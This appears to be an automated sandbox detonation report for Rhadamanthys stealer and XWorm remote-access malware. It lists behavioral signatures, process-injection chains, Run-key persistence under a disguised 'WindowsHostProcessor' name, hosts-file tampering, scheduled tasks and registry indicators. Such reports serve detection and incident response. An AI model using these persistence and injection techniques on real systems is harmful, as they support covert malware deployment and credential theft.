Analysis Overview
Threat Level: Known bad
The file https://github.com was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Detect rhadamanthys stealer shellcode
Rhadamanthys
Xworm
Blocklisted process makes network request
Stops running service(s)
Modifies Installed Components in the registry
Downloads MZ/PE file
Drops file in Drivers directory
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
Checks computer location settings
Uses the VBS compiler for execution
Executes dropped EXE
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Enumerates connected drives
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Program crash
Enumerates physical storage devices
Kills process with taskkill
Enumerates system info in registry
Checks processor information in registry
Checks SCSI registry key(s)
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Enumerates processes with tasklist
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
Creates scheduled task(s)
Uses Task Scheduler COM API
Modifies Control Panel
Suspicious behavior: AddClipboardFormatListener
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-07-16 21:46
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-16 21:46
Reported
2023-07-16 21:57
Platform
win10v2004-20230703-en
Max time kernel
666s
Max time network
669s
Command Line
Signatures
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 440 created 4136 | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe | C:\Windows\explorer.exe |
| PID 440 created 4136 | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe | C:\Windows\explorer.exe |
| PID 440 created 4136 | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe | C:\Windows\explorer.exe |
| PID 440 created 4136 | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe | C:\Windows\explorer.exe |
| PID 440 created 4136 | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe | C:\Windows\explorer.exe |
| PID 3484 created 4136 | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j42.exe | C:\Windows\explorer.exe |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Static\wsappx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\XWorm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\rundll32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\AtlsWare.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\builder.exe | N/A |
| N/A | N/A | C:\Users\Static\wsappx.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XWorm.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\AtlsWare.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j42.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j43.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\XHVNC.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Uses the VBS compiler for execution
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Desktop\XWorm.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 440 set thread context of 2544 | N/A | C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe | C:\Windows\System32\dialer.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\builder.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\Desktop\builder.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\Colors | C:\Windows\System32\rundll32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\System32\rundll32.exe | N/A |
